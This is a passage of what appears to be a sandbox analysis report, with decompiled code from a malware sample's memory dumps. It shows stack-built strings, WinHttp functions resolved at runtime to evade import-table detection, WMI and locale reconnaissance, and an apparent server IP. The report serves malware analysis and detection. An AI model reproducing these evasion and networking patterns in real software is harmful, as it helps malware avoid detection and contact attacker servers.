    					 *(_t889 - 0x94) = _t879;
    				}
    				 *(_t889 - 0x84) = 0x12e06d8;
    				if(_t821 == 0) {
    					 *(_t889 - 0x84) = _t879;
    				}
    				_t525 =  *((intOrPtr*)(_t889 - 8));
    				if(_t525 == 0) {
    					_t525 = E012C102D(_t889 - 0x100);
    				}
    				_t822 =  &(_t886[0x188]);
    				_t849 =  *_t822 & 0x0000ffff;
    				 *(_t889 - 0x8c) = 0x12e06d4;
    				if(_t849 != 0) {
    					 *(_t889 - 0x98) = _t822;
    				} else {
    					 *(_t889 - 0x8c) = _t879;
    					 *(_t889 - 0x98) = _t879;
    				}
    				 *(_t889 - 0x88) = 0x12e06d8;
    				if(_t849 == 0) {
    					 *(_t889 - 0x88) = _t879;
    				}
    				_t823 = _t889 - 0xbc;
    				if( *((intOrPtr*)(_t889 - 0x90)) == 0) {
    					_t823 = _t889 - 0xd0;
    				}
    				_t850 = _t886[0xc8] & 0x0000ffff;
    				 *((intOrPtr*)(_t889 - 0x80)) = _t823;
    				 *(_t889 - 0x30) = 0x12e06d4;
    				if(_t850 != 0) {
    					_t773 =  &(_t886[0xc8]);
    				} else {
    					 *(_t889 - 0x30) = _t879;
    					_t773 = _t879;
    				}
    				if(_t850 != 0) {
    					_t879 = 0x12e06d8;
    				}
    				_t851 = _t889 - 0xbc;
    				if( *((intOrPtr*)(_t889 - 0x90)) == 0) {
    					_t851 = _t889 - 0xd0;
    				}
    				_push( *(_t889 - 0xa4));
    				_push( *(_t889 - 0xa8));
    				_push( &(_t886[0x248]));
    				_push( *(_t889 - 4));
    				_push( *(_t889 - 0xa0));
    				_push( *(_t889 - 0x94));
    				_push( *(_t889 - 0x84));
    				_push( &(_t886[0x1c8]));
    				_push(_t525);
    				_push( &(_t886[0x29c]));
    				_push( &(_t886[0x28c]));
    				_push( &(_t886[0x108]));
    				_push( *(_t889 - 0x8c));
    				_push( *(_t889 - 0x98));
    				_push( *(_t889 - 0x88));
    				_push( &(_t886[0x148]));
    				_push( *((intOrPtr*)(_t889 - 0x80)));
    				_push( *(_t889 - 0x30));
    				_push(_t773);
    				_push(_t879);
    				_push( &(_t886[0x88]));
    				_push(_t886[0x2ac]);
    				_push(_t886[0x2ae]);
    				_push(_t886[0x86]);
    				_push(_t886[0x82]);
    				_push(_t886[0x84]);
    				_push(_t851);
    				_push(_t886);
    				_t532 = E012C1048(_t889 - 0x460);
    				_t880 =  *((intOrPtr*)(_t889 - 0x470));
    				E012C1000( *((intOrPtr*)(_t889 - 0x464)), _t532, _t886[0x80]);
    				_t535 = E012C1195(_t851, _t880, _t886, 8);
    				_t826 = _t880;
    				 *0x12e5978 = _t535;
    				 *((intOrPtr*)(_t535 + 4)) = _t880;
    				_t852 = _t826 + 2;
    				do {
    					_t881 =  *_t826;
    					_t826 = _t826 + 2;
    				} while (_t881 != 0);
    				_t828 = _t826 - _t852 >> 1;
    				_t829 = _t828 + _t828 + 2;
    				 *_t535 = _t828 + _t828 + 2;
    				if( *((intOrPtr*)(_t889 - 0x10)) != 0) {
    					_t540 =  *((intOrPtr*)(_t889 - 0xc));
    					if(_t540 != 0) {
    						_t829 =  *_t540;
    						 *((intOrPtr*)( *_t540 + 8))(_t540);
    					}
    					_t541 =  *((intOrPtr*)(_t889 - 0x14));
    					if(_t541 != 0) {
    						_t829 =  *_t541;
    						 *((intOrPtr*)( *_t541 + 8))(_t541);
    					}
    				}
    				if( *((intOrPtr*)(_t889 - 8)) != 0) {
    					E012C115B(_t829, _t852, _t886,  *((intOrPtr*)(_t889 - 8)));
    					_pop(_t829);
    				}
    				E012C115B(_t829, _t852, _t886,  *(_t889 - 0x9c));
    				_pop(_t830);
    				E012C115B(_t830, _t852, _t886,  *(_t889 - 0x18));
    				_pop(_t831);
    				_t538 = E012C115B(_t831, _t852, _t886, _t886);
    				return _t538;
    			}

    Instruction address column for the decompiled lines above, detached from the code by extraction (first entry 0x012d41c3, last entry 0x012d50aa).

    APIs
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.13484397461.0000000001388000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000001.13484384581.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000001.13484628530.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_12c0000_ASC.jbxd
    C-Code - Quality: 98%
    			E012D5B62(void* __ecx, intOrPtr* __edi) {
    				short _t134;
    				short _t135;
    				short _t136;
    				short _t137;
    				short _t138;
    				short _t139;
    				struct HINSTANCE__* _t142;
    				void* _t143;
    				_Unknown_base(*)()* _t168;
    				intOrPtr* _t179;
    				void* _t181;
    
    				_t179 = _t181 - 0x78;
    				// Wide-char stack string: 0x57 0x69 0x6e 0x48 0x74 0x74 0x70 0x00 = L"WinHttp".
    				// Assembling the module name on the stack keeps it out of the import table and the string section.
    				_t134 = 0x57;
    				 *((short*)(_t179 - 0xb4)) = _t134;
    				_t135 = 0x69;
    				 *((short*)(_t179 - 0xb2)) = _t135;
    				_t136 = 0x6e;
    				 *((short*)(_t179 - 0xb0)) = _t136;
    				_t137 = 0x48;
    				 *((short*)(_t179 - 0xae)) = _t137;
    				_t138 = 0x74;
    				 *((short*)(_t179 - 0xac)) = _t138;
    				 *((short*)(_t179 - 0xaa)) = _t138;
    				_t139 = 0x70;
    				 *((short*)(_t179 - 0xa8)) = _t139;
    				 *((short*)(_t179 - 0xa6)) = 0;
    				_push(_t179 - 0xb4);
    				// E0133CFF3 receives the L"WinHttp" buffer and returns a module handle (HINSTANCE); zero means the module was not obtained.
    				_t142 = E0133CFF3(_t179 - 0xb4);
    				 *(_t179 + 0x74) = _t142;
    				if(_t142 == 0) {
    					L14:
    					_t143 = 0;
    				} else {
    					// Every export name below is built from little-endian dword/word constants on the stack and
    					// resolved with GetProcAddress; the pointers are stored in the function table at __edi.
    					// Dynamic resolution of this kind is a detection point: the binary imports none of these by name.
    					// "WinH" "ttpS" "endR" "eque" "st" -> "WinHttpSendRequest" (slot +0)
    					 *(_t179 - 8) = 0x486e6957;
    					 *((intOrPtr*)(_t179 - 4)) = 0x53707474;
    					 *_t179 = 0x52646e65;
    					 *((intOrPtr*)(_t179 + 4)) = 0x65757165;
    					 *((short*)(_t179 + 8)) = 0x7473;
    					 *((char*)(_t179 + 0xa)) = 0;
    					 *__edi = GetProcAddress(_t142, _t179 - 8);
    					// "WinH" "ttpG" "etIE" "Prox" "yCon" "figF" "orCu" "rren" "tUse" "r" -> "WinHttpGetIEProxyConfigForCurrentUser" (slot +4)
    					 *(_t179 - 0xa4) = 0x486e6957;
    					 *((intOrPtr*)(_t179 - 0xa0)) = 0x47707474;
    					 *((intOrPtr*)(_t179 - 0x9c)) = 0x45497465;
    					 *((intOrPtr*)(_t179 - 0x98)) = 0x786f7250;
    					 *((intOrPtr*)(_t179 - 0x94)) = 0x6e6f4379;
    					 *((intOrPtr*)(_t179 - 0x90)) = 0x46676966;
    					 *((intOrPtr*)(_t179 - 0x8c)) = 0x7543726f;
    					 *((intOrPtr*)(_t179 - 0x88)) = 0x6e657272;
    					 *((intOrPtr*)(_t179 - 0x84)) = 0x65735574;
    					 *((short*)(_t179 - 0x80)) = 0x72;
    					 *((intOrPtr*)(__edi + 4)) = GetProcAddress( *(_t179 + 0x74), _t179 - 0xa4);
    					// "WinH" "ttpS" "etOp" "tion" -> "WinHttpSetOption" (slot +8)
    					 *(_t179 + 0x34) = 0x486e6957;
    					 *((intOrPtr*)(_t179 + 0x38)) = 0x53707474;
    					 *((intOrPtr*)(_t179 + 0x3c)) = 0x704f7465;
    					 *((intOrPtr*)(_t179 + 0x40)) = 0x6e6f6974;
    					 *((char*)(_t179 + 0x44)) = 0;
    					 *((intOrPtr*)(__edi + 8)) = GetProcAddress( *(_t179 + 0x74), _t179 + 0x34);
    					// "WinH" "ttpS" "etTi" "meou" "ts" -> "WinHttpSetTimeouts" (slot +0xc)
    					 *(_t179 + 0x20) = 0x486e6957;
    					 *((intOrPtr*)(_t179 + 0x24)) = 0x53707474;
    					 *((intOrPtr*)(_t179 + 0x28)) = 0x69547465;
    					 *((intOrPtr*)(_t179 + 0x2c)) = 0x756f656d;
    					 *((short*)(_t179 + 0x30)) = 0x7374;
    					 *((char*)(_t179 + 0x32)) = 0;
    					 *((intOrPtr*)(__edi + 0xc)) = GetProcAddress( *(_t179 + 0x74), _t179 + 0x20);
    					// "WinH" "ttpR" "ecei" "veRe" "spon" "se" -> "WinHttpReceiveResponse" (slot +0x10)
    					 *(_t179 - 0x60) = 0x486e6957;
    					 *((intOrPtr*)(_t179 - 0x5c)) = 0x52707474;
    					 *((intOrPtr*)(_t179 - 0x58)) = 0x69656365;
    					 *((intOrPtr*)(_t179 - 0x54)) = 0x65526576;
    					 *((intOrPtr*)(_t179 - 0x50)) = 0x6e6f7073;
    					 *((short*)(_t179 - 0x4c)) = 0x6573;
    					 *((char*)(_t179 - 0x4a)) = 0;
    					 *((intOrPtr*)(__edi + 0x10)) = GetProcAddress( *(_t179 + 0x74), _t179 - 0x60);
    					// "WinH" "ttpC" "onne" "ct" -> "WinHttpConnect" (slot +0x14)
    					 *(_t179 + 0x58) = 0x486e6957;
    					 *((intOrPtr*)(_t179 + 0x5c)) = 0x43707474;
    					 *((intOrPtr*)(_t179 + 0x60)) = 0x656e6e6f;
    					 *((short*)(_t179 + 0x64)) = 0x7463;
    					 *((char*)(_t179 + 0x66)) = 0;
    					 *((intOrPtr*)(__edi + 0x14)) = GetProcAddress( *(_t179 + 0x74), _t179 + 0x58);
    					// "WinH" "ttpO" "pen\0" -> "WinHttpOpen" (slot +0x18)
    					 *(_t179 + 0x68) = 0x486e6957;
    					 *((intOrPtr*)(_t179 + 0x6c)) = 0x4f707474;
    					 *((intOrPtr*)(_t179 + 0x70)) = 0x6e6570;
    					 *((intOrPtr*)(__edi + 0x18)) = GetProcAddress( *(_t179 + 0x74), _t179 + 0x68);
    					// "WinH" "ttpO" "penR" "eque" "st" -> "WinHttpOpenRequest" (slot +0x1c)
    					 *(_t179 + 0xc) = 0x486e6957;
    					 *((intOrPtr*)(_t179 + 0x10)) = 0x4f707474;
    					 *((intOrPtr*)(_t179 + 0x14)) = 0x526e6570;
    					 *((intOrPtr*)(_t179 + 0x18)) = 0x65757165;
    					 *((short*)(_t179 + 0x1c)) = 0x7473;
    					 *((char*)(_t179 + 0x1e)) = 0;
    					 *((intOrPtr*)(__edi + 0x1c)) = GetProcAddress( *(_t179 + 0x74), _t179 + 0xc);
    					// "WinH" "ttpG" "etPr" "oxyF" "orUr" "l" -> "WinHttpGetProxyForUrl" (slot +0x20)
    					 *(_t179 - 0x48) = 0x486e6957;
    					 *((intOrPtr*)(_t179 - 0x44)) = 0x47707474;
    					 *((intOrPtr*)(_t179 - 0x40)) = 0x72507465;
    					 *((intOrPtr*)(_t179 - 0x3c)) = 0x4679786f;
    					 *((intOrPtr*)(_t179 - 0x38)) = 0x7255726f;
    					 *((short*)(_t179 - 0x34)) = 0x6c;
    					 *((intOrPtr*)(__edi + 0x20)) = GetProcAddress( *(_t179 + 0x74), _t179 - 0x48);
    					// "WinH" "ttpR" "eadD" "ata\0" -> "WinHttpReadData" (slot +0x24)
    					 *(_t179 + 0x48) = 0x486e6957;
    					 *((intOrPtr*)(_t179 + 0x4c)) = 0x52707474;
    					 *((intOrPtr*)(_t179 + 0x50)) = 0x44646165;
    					 *((intOrPtr*)(_t179 + 0x54)) = 0x617461;
    					 *((intOrPtr*)(__edi + 0x24)) = GetProcAddress( *(_t179 + 0x74), _t179 + 0x48);
    					// "WinH" "ttpC" "lose" "Hand" "le" -> "WinHttpCloseHandle" (slot +0x28)
    					 *(_t179 - 0x1c) = 0x486e6957;
    					 *((intOrPtr*)(_t179 - 0x18)) = 0x43707474;
    					 *((intOrPtr*)(_t179 - 0x14)) = 0x65736f6c;
    					 *((intOrPtr*)(_t179 - 0x10)) = 0x646e6148;
    					 *((short*)(_t179 - 0xc)) = 0x656c;
    					 *((char*)(_t179 - 0xa)) = 0;
    					 *((intOrPtr*)(__edi + 0x28)) = GetProcAddress( *(_t179 + 0x74), _t179 - 0x1c);
    					// "WinH" "ttpQ" "uery" "Head" "ers\0" -> "WinHttpQueryHeaders" (slot +0x2c)
    					 *(_t179 - 0x30) = 0x486e6957;
    					 *((intOrPtr*)(_t179 - 0x2c)) = 0x51707474;
    					 *((intOrPtr*)(_t179 - 0x28)) = 0x79726575;
    					 *((intOrPtr*)(_t179 - 0x24)) = 0x64616548;
    					 *((intOrPtr*)(_t179 - 0x20)) = 0x737265;
    					 *((intOrPtr*)(__edi + 0x2c)) = GetProcAddress( *(_t179 + 0x74), _t179 - 0x30);
    					// "WinH" "ttpA" "ddRe" "ques" "tHea" "ders" -> "WinHttpAddRequestHeaders" (slot +0x30)
    					 *(_t179 - 0x7c) = 0x486e6957;
    					 *((intOrPtr*)(_t179 - 0x78)) = 0x41707474;
    					 *((intOrPtr*)(_t179 - 0x74)) = 0x65526464;
    					 *((intOrPtr*)(_t179 - 0x70)) = 0x73657571;
    					 *((intOrPtr*)(_t179 - 0x6c)) = 0x61654874;
    					 *((intOrPtr*)(_t179 - 0x68)) = 0x73726564;
    					 *((char*)(_t179 - 0x64)) = 0;
    					_t168 = GetProcAddress( *(_t179 + 0x74), _t179 - 0x7c);
    					 *(__edi + 0x30) = _t168;
    					// Return 0 if any resolved pointer is NULL. The slot at +0x14 (WinHttpConnect) is not part of this check.
    					if( *__edi == 0 ||  *((intOrPtr*)(__edi + 4)) == 0 ||  *((intOrPtr*)(__edi + 8)) == 0 ||  *((intOrPtr*)(__edi + 0xc)) == 0 ||  *((intOrPtr*)(__edi + 0x10)) == 0 ||  *((intOrPtr*)(__edi + 0x18)) == 0 ||  *((intOrPtr*)(__edi + 0x1c)) == 0 ||  *((intOrPtr*)(__edi + 0x20)) == 0 ||  *((intOrPtr*)(__edi + 0x24)) == 0 ||  *((intOrPtr*)(__edi + 0x28)) == 0 ||  *((intOrPtr*)(__edi + 0x2c)) == 0 || _t168 == 0) {
    						goto L14;
    					} else {
    						_t143 = 1;
    					}
    				}
    				return _t143;
    			}

    Instruction address column for the decompiled lines above, detached from the code by extraction (first entry 0x012d5b63, last entry 0x012d5ec5).

    APIs
    • GetProcAddress.KERNEL32(00000000,?,192.243.101.124,00000034,?,00000200), ref: 012D5C05
    • GetProcAddress.KERNEL32(?,?), ref: 012D5C73
    • GetProcAddress.KERNEL32(?,?), ref: 012D5C9E
    • GetProcAddress.KERNEL32(?,?), ref: 012D5CCF
    • GetProcAddress.KERNEL32(?,?), ref: 012D5D07
    • GetProcAddress.KERNEL32(?,?), ref: 012D5D31
    • GetProcAddress.KERNEL32(?,?), ref: 012D5D52
    • GetProcAddress.KERNEL32(?,?), ref: 012D5D83
    • GetProcAddress.KERNEL32(?,?), ref: 012D5DB8
    • GetProcAddress.KERNEL32(?,?), ref: 012D5DE0
    • GetProcAddress.KERNEL32(?,?), ref: 012D5E11
    • GetProcAddress.KERNEL32(?,?), ref: 012D5E40
    • GetProcAddress.KERNEL32(?,?), ref: 012D5E79
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 68%
    			E012D3E83(struct HINSTANCE__* __eax, char __ebx, void* __edx, intOrPtr __edi, intOrPtr* __esi) {
    				_Unknown_base(*)()* _t96;
    				CHAR* _t98;
    				_Unknown_base(*)()* _t100;
    				short _t102;
    				short _t104;
    				short* _t105;
    				short _t106;
    				short _t110;
    				short _t111;
    				short _t112;
    				short _t113;
    				short _t114;
    				short _t115;
    				short _t116;
    				short _t117;
    				short _t118;
    				short _t119;
    				short _t120;
    				short _t121;
    				short _t122;
    				short _t123;
    				short _t124;
    				short _t126;
    				short _t127;
    				short _t128;
    				short _t129;
    				short _t130;
    				short _t132;
    				short _t134;
    				short _t135;
    				short _t136;
    				short _t142;
    				short _t144;
    				short _t145;
    				short _t146;
    				short _t148;
    				short _t149;
    				short _t150;
    				short _t151;
    				void* _t157;
    				char _t169;
    				void* _t174;
    				short _t176;
    				intOrPtr* _t178;
    				short* _t179;
    				void* _t180;
    
    				_t178 = __esi;
    				_t175 = __edi;
    				_t174 = __edx;
    				_t169 = __ebx;
    				_t96 = GetProcAddress(__eax, ??);
    				if(_t96 != 0) {
    					_push(_t180 - 0x2c);
    					_push(4);
    					_push(__edi + 0x390);
    					_push(0);
    					if( *_t96() == 0) {
    						 *((intOrPtr*)(__edi + 0x510)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 - 0x2c)) + 0xc));
    						E012C1667(__edi + 0x410, 0x40,  *((intOrPtr*)( *((intOrPtr*)(_t180 - 0x2c)) + 0x24)), 0xffffffff);
    						_push(_t180 - 0x30);
    						_push( *((intOrPtr*)( *((intOrPtr*)(_t180 - 0x2c)) + 0x60)));
    						return E013822E0( *((intOrPtr*)(_t180 - 0x2c)), __edi);
    					}
    				}
    				_t98 = _t180 - 0x3c;
    				 *((char*)(_t180 - 0x58)) = 0x47;
    				 *((char*)(_t180 - 0x57)) = _t169;
    				 *((intOrPtr*)(_t180 - 0x56)) = 0x636f4c74;
    				 *((short*)(_t180 - 0x52)) = 0x6c61;
    				 *((char*)(_t180 - 0x50)) = _t169;
    				 *((intOrPtr*)(_t180 - 0x4f)) = 0x6f666e49;
    				 *((short*)(_t180 - 0x4b)) = 0x57;
    				_t100 = GetProcAddress(E0137C36C(), _t98);
    				 *(_t180 - 8) = _t100;
    				_t102 =  *(_t180 - 8)(0x400, 0x59, _t175 + 0x518, 0x10, _t98, _t180 - 0x58);
    				if(_t102 == 0) {
    					 *((short*)(_t175 + 0x518)) = _t102;
    				}
    				_t104 =  *(_t180 - 8)(0x400, 0x5a, _t175 + 0x538, 0x10);
    				if(_t104 == 0) {
    					 *((short*)(_t175 + 0x538)) = _t104;
    				}
    				 *(_t180 - 8) =  *(_t180 - 8) & 0x00000000;
    				if( *((intOrPtr*)(_t180 - 0x10)) != 0) {
    					_t110 = 0x53;
    					 *((short*)(_t180 - 0x214)) = _t110;
    					_t111 = 0x45;
    					 *((short*)(_t180 - 0x212)) = _t111;
    					_t112 = 0x4c;
    					 *((short*)(_t180 - 0x210)) = _t112;
    					_t113 = 0x45;
    					 *((short*)(_t180 - 0x20e)) = _t113;
    					_t114 = 0x43;
    					 *((short*)(_t180 - 0x20c)) = _t114;
    					_t115 = 0x54;
    					 *((short*)(_t180 - 0x20a)) = _t115;
    					_t116 = 0x20;
    					 *((short*)(_t180 - 0x208)) = _t116;
    					_t117 = 0x2a;
    					 *((short*)(_t180 - 0x206)) = _t117;
    					_t118 = 0x20;
    					 *((short*)(_t180 - 0x204)) = _t118;
    					_t119 = 0x46;
    					 *((short*)(_t180 - 0x202)) = _t119;
    					_t120 = 0x52;
    					 *((short*)(_t180 - 0x200)) = _t120;
    					_t121 = 0x4f;
    					 *((short*)(_t180 - 0x1fe)) = _t121;
    					_t122 = 0x4d;
    					 *((short*)(_t180 - 0x1fc)) = _t122;
    					_t123 = 0x20;
    					 *((short*)(_t180 - 0x1fa)) = _t123;
    					_t124 = 0x57;
    					_t176 = 0x69;
    					 *((short*)(_t180 - 0x1f8)) = _t124;
    					 *((short*)(_t180 - 0x1f6)) = _t176;
    					_t126 = 0x6e;
    					 *((short*)(_t180 - 0x1f4)) = _t126;
    					_t127 = 0x33;
    					 *((short*)(_t180 - 0x1f2)) = _t127;
    					_t128 = 0x32;
    					 *((short*)(_t180 - 0x1f0)) = _t128;
    					_t129 = 0x5f;
    					 *((short*)(_t180 - 0x1ee)) = _t129;
    					_t130 = 0x54;
    					 *((short*)(_t180 - 0x1ec)) = _t130;
    					 *((short*)(_t180 - 0x1ea)) = _t176;
    					_t132 = 0x6d;
    					 *((short*)(_t180 - 0x1e8)) = _t132;
    					 *((short*)(_t180 - 0x1e6)) = _t169;
    					_t134 = 0x5a;
    					 *((short*)(_t180 - 0x1e4)) = _t134;
    					_t135 = 0x6f;
    					 *((short*)(_t180 - 0x1e2)) = _t135;
    					_t136 = 0x6e;
    					 *((short*)(_t180 - 0x1e0)) = _t136;
    					 *((short*)(_t180 - 0x1de)) = _t169;
    					 *((short*)(_t180 - 0x1dc)) = 0;
    					 *(_t180 - 8) = E012C1195(_t174, _t176, _t178, 0x2000);
    					 *_t178(_t180 - 0x28);
    					_t142 = 0x44;
    					 *((short*)(_t180 - 0x1b8)) = _t142;
    					 *((short*)(_t180 - 0x1b6)) = _t169;
    					_t144 = 0x73;
    					 *((short*)(_t180 - 0x1b4)) = _t144;
    					_t145 = 0x63;
    					 *((short*)(_t180 - 0x1b2)) = _t145;
    					_t146 = 0x72;
    					 *((short*)(_t180 - 0x1b0)) = _t146;
    					 *((short*)(_t180 - 0x1ae)) = _t176;
    					_t148 = 0x70;
    					 *((short*)(_t180 - 0x1ac)) = _t148;
    					_t149 = 0x74;
    					 *((short*)(_t180 - 0x1aa)) = _t149;
    					_t150 = 0x6f;
    					 *((short*)(_t180 - 0x1a6)) = _t150;
    					_t151 = 0x6e;
    					 *((short*)(_t180 - 0x1a4)) = _t151;
    					 *((short*)(_t180 - 0x1a2)) = 0;
    					 *((short*)(_t180 - 0x1a8)) = _t176;
    					if(E012CD2FF(_t169,  *((intOrPtr*)(_t180 - 0xc)), _t178, _t180 - 0x214, _t180 - 0x1b8, _t180 - 0x28) != 0 &&  *((short*)(_t180 - 0x28)) == 8) {
    						E012C1604( *(_t180 - 8), 0xfff,  *((intOrPtr*)(_t180 - 0x20)));
    					}
    					_t157 = _t180 - 0x28;
    					_push(_t157);
    					_push(_t157);
    					E01356735();
    					_t175 =  *((intOrPtr*)(_t180 - 4));
    				}
    				_t105 = E012C1195(_t174, _t175, _t178, 0xfffe);
    				_t179 = _t105;
    				_push(_t179);
    				_push(0x7ffe);
    				_push(_t105);
    				_t106 = L01387B1C(_t105);
    				if(_t106 == 0) {
    					 *_t179 = _t106;
    				}
    				_push(_t180 - 0x7c);
    				_push(_t180 - 0x3c);
    				 *((char*)(_t180 - 0x7c)) = 0x47;
    				 *((char*)(_t180 - 0x7b)) = _t169;
    				 *((intOrPtr*)(_t180 - 0x7a)) = 0x73694474;
    				 *((short*)(_t180 - 0x76)) = 0x466b;
    				 *((char*)(_t180 - 0x74)) = 0x72;
    				 *((char*)(_t180 - 0x73)) = _t169;
    				 *((char*)(_t180 - 0x72)) = _t169;
    				 *((intOrPtr*)(_t180 - 0x71)) = 0x63617053;
    				 *((char*)(_t180 - 0x6d)) = _t169;
    				 *((intOrPtr*)(_t180 - 0x6c)) = 0x577845;
    				return E0132A5CA(_t180 - 0x3c);
    			}
    0x012d3e83
    0x012d3e83
    0x012d3e83
    0x012d3e83
    0x012d3e84
    0x012d3e8c
    0x012d3e91
    0x012d3e92
    0x012d3e9a
    0x012d3e9b
    0x012d3ea1
    0x012d3ea9
    0x012d3ec0
    0x012d3ecb
    0x012d3ecf
    0x00000000
    0x012d3ed2
    0x012d3ea1
    0x012d3ef6
    0x012d3efa
    0x012d3efe
    0x012d3f01
    0x012d3f08
    0x012d3f0e
    0x012d3f11
    0x012d3f18
    0x012d3f25
    0x012d3f2d
    0x012d3f3e
    0x012d3f43
    0x012d3f45
    0x012d3f45
    0x012d3f5c
    0x012d3f61
    0x012d3f63
    0x012d3f63
    0x012d3f6a
    0x012d3f72
    0x012d3f7a
    0x012d3f7d
    0x012d3f84
    0x012d3f87
    0x012d3f8e
    0x012d3f91
    0x012d3f98
    0x012d3f9b
    0x012d3fa2
    0x012d3fa5
    0x012d3fac
    0x012d3faf
    0x012d3fb6
    0x012d3fb9
    0x012d3fc0
    0x012d3fc3
    0x012d3fca
    0x012d3fcd
    0x012d3fd4
    0x012d3fd7
    0x012d3fde
    0x012d3fe1
    0x012d3fe8
    0x012d3feb
    0x012d3ff2
    0x012d3ff5
    0x012d3ffc
    0x012d3fff
    0x012d4006
    0x012d4009
    0x012d400c
    0x012d4015
    0x012d401c
    0x012d401f
    0x012d4026
    0x012d4029
    0x012d4030
    0x012d4033
    0x012d403a
    0x012d403d
    0x012d4044
    0x012d4045
    0x012d4050
    0x012d4057
    0x012d4058
    0x012d4063
    0x012d406a
    0x012d406d
    0x012d4074
    0x012d4075
    0x012d407e
    0x012d407f
    0x012d4088
    0x012d4096
    0x012d40a2
    0x012d40aa
    0x012d40ae
    0x012d40af
    0x012d40ba
    0x012d40c1
    0x012d40c4
    0x012d40cb
    0x012d40ce
    0x012d40d5
    0x012d40d6
    0x012d40e1
    0x012d40e8
    0x012d40eb
    0x012d40f2
    0x012d40f3
    0x012d40fc
    0x012d40fd
    0x012d4106
    0x012d4107
    0x012d4110
    0x012d4128
    0x012d413d
    0x012d4151
    0x012d4156
    0x012d4159
    0x012d415c
    0x012d415d
    0x012d415e
    0x012d4163
    0x012d4163
    0x012d416b
    0x012d4171
    0x012d4173
    0x012d4174
    0x012d4179
    0x012d417a
    0x012d4181
    0x012d4183
    0x012d4183
    0x012d4189
    0x012d418d
    0x012d418e
    0x012d4192
    0x012d4195
    0x012d419c
    0x012d41a2
    0x012d41a6
    0x012d41a9
    0x012d41ac
    0x012d41b3
    0x012d41b6
    0x012d41c2

    APIs
    • GetProcAddress.KERNEL32 ref: 012D3E84
    • GetProcAddress.KERNEL32(00000000,?), ref: 012D3F25
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.13712061616.00000000012C1000.00000020.sdmp, Offset: 012C0000, based on PE: true
    • Associated: 00000005.00000002.13712049935.00000000012C0000.00000002.sdmp
    • Associated: 00000005.00000002.13712100432.00000000012DC000.00000002.sdmp
    • Associated: 00000005.00000002.13712116936.00000000012E2000.00000004.sdmp
    • Associated: 00000005.00000002.13712132386.00000000012E7000.00000020.sdmp
    • Associated: 00000005.00000002.13712484929.000000000143B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_12c0000_ASC.jbxd
    C-Code - Quality: 83%
    			E012D3ED8(void* __eax, char __ebx, void* __edx, intOrPtr __edi, intOrPtr* __esi) {
    				CHAR* _t88;
    				_Unknown_base(*)()* _t90;
    				short _t92;
    				short _t94;
    				short* _t95;
    				short _t96;
    				short _t100;
    				short _t101;
    				short _t102;
    				short _t103;
    				short _t104;
    				short _t105;
    				short _t106;
    				short _t107;
    				short _t108;
    				short _t109;
    				short _t110;
    				short _t111;
    				short _t112;
    				short _t113;
    				short _t114;
    				short _t116;
    				short _t117;
    				short _t118;
    				short _t119;
    				short _t120;
    				short _t122;
    				short _t124;
    				short _t125;
    				short _t126;
    				short _t132;
    				short _t134;
    				short _t135;
    				short _t136;
    				short _t138;
    				short _t139;
    				short _t140;
    				short _t141;
    				void* _t147;
    				char _t152;
    				void* _t155;
    				intOrPtr _t156;
    				short _t157;
    				intOrPtr* _t159;
    				short* _t160;
    				void* _t161;
    				void* _t162;
    
    				_t159 = __esi;
    				_t156 = __edi;
    				_t155 = __edx;
    				_t152 = __ebx;
    				if(__eax != 0) {
    					E012C1667(__edi + 0x490, 0x40,  *((intOrPtr*)(_t161 - 0x30)), 0xffffffff);
    					_t162 = _t162 + 0x10;
    				}
    				_t88 = _t161 - 0x3c;
    				 *((char*)(_t161 - 0x58)) = 0x47;
    				 *((char*)(_t161 - 0x57)) = _t152;
    				 *((intOrPtr*)(_t161 - 0x56)) = 0x636f4c74;
    				 *((short*)(_t161 - 0x52)) = 0x6c61;
    				 *((char*)(_t161 - 0x50)) = _t152;
    				 *((intOrPtr*)(_t161 - 0x4f)) = 0x6f666e49;
    				 *((short*)(_t161 - 0x4b)) = 0x57;
    				_t90 = GetProcAddress(E0137C36C(), _t88);
    				 *(_t161 - 8) = _t90;
    				_t92 =  *(_t161 - 8)(0x400, 0x59, _t156 + 0x518, 0x10, _t88, _t161 - 0x58);
    				if(_t92 == 0) {
    					 *((short*)(_t156 + 0x518)) = _t92;
    				}
    				_t94 =  *(_t161 - 8)(0x400, 0x5a, _t156 + 0x538, 0x10);
    				if(_t94 == 0) {
    					 *((short*)(_t156 + 0x538)) = _t94;
    				}
    				 *(_t161 - 8) =  *(_t161 - 8) & 0x00000000;
    				if( *((intOrPtr*)(_t161 - 0x10)) != 0) {
    					_t100 = 0x53;
    					 *((short*)(_t161 - 0x214)) = _t100;
    					_t101 = 0x45;
    					 *((short*)(_t161 - 0x212)) = _t101;
    					_t102 = 0x4c;
    					 *((short*)(_t161 - 0x210)) = _t102;
    					_t103 = 0x45;
    					 *((short*)(_t161 - 0x20e)) = _t103;
    					_t104 = 0x43;
    					 *((short*)(_t161 - 0x20c)) = _t104;
    					_t105 = 0x54;
